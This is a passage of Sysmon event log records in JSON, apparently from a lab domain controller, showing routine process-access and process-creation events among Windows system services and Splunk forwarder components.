08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7446,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7447,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7448,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-224F-5F25-0000-00107B2D0D00}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-224F-5F25-0000-00107B2D0D00}","TargetProcessId":"5040","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7449,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.460\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010936E0C00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.460","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010936E0C00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7450,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.460\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010936E0C00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.460","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010936E0C00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7451,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.476\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2255-5F25-0000-0010998F0D00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.476","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2255-5F25-0000-0010998F0D00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7452,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:41.538\r\nSourceProcessGUID: {41C8662E-2255-5F25-0000-0010938D0D00}\r\nSourceProcessId: 5040\r\nSourceThreadId: 4476\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:41.538","SourceProcessGUID":"{41C8662E-2255-5F25-0000-0010938D0D00}","SourceProcessId":"5040","SourceThreadId":"4476","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7453,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.070\r\nProcessGuid: {41C8662E-2256-5F25-0000-001017930D00}\r\nProcessId: 672\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.070","ProcessGuid":"{41C8662E-2256-5F25-0000-001017930D00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7454,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101D120C00}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program 